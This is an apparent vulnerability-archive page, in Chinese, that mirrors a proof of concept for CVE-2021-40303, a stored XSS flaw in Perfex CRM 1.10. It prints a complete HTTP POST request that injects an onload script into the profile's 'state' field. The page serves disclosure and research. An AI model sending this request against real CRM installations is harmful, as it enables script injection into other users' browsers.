目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CVE-2021-40303 PoC — Perfex Crm 跨站脚本漏洞

来源
https://github.com/zecopro/CVE-2021-40303
关联漏洞
标题:Perfex Crm 跨站脚本漏洞 (CVE-2021-40303)
Description:Perfex Crm是一款客户关系管理软件。用于在云中管理客户、项目和创建发票。 Perfex Crm 1.10版本存在安全漏洞,该漏洞源于通过/clients/profile发现包含跨站点脚本(XSS)漏洞。
Description
perfex crm 1.10 is vulnerable to Stored Cross Site Scripting (XSS) via /clients/profile.
介绍
# CVE-2021-40303
perfex crm 1.10 is vulnerable to Stored Cross Site Scripting (XSS) via /clients/profile.

poc:
```
POST /clients/profile HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058

Content-Length: 1548

Origin: http://localhost

Connection: close

Referer: http://localhost/clients/profile

Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038

Upgrade-Insecure-Requests: 1



-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="profile"



1

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="profile_image"; filename=""

Content-Type: application/octet-stream





-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="firstname"



adfgsg

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="lastname"



fsdgfdg

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="company"



test

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="vat"



1

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="phonenumber"





-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="country"



105

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="city"



asdf

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="address"



asdf

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="zip"



313

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="state"



""><body onload=alert("XSS")>">

-----------------------------325278703021926100783634528058--

then any one open profile page in user the xss its executed
文件快照

 [4.0K]  /data/pocs/691b43a218db1d647478f53bd4afd2780533ab07
└── [2.2K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。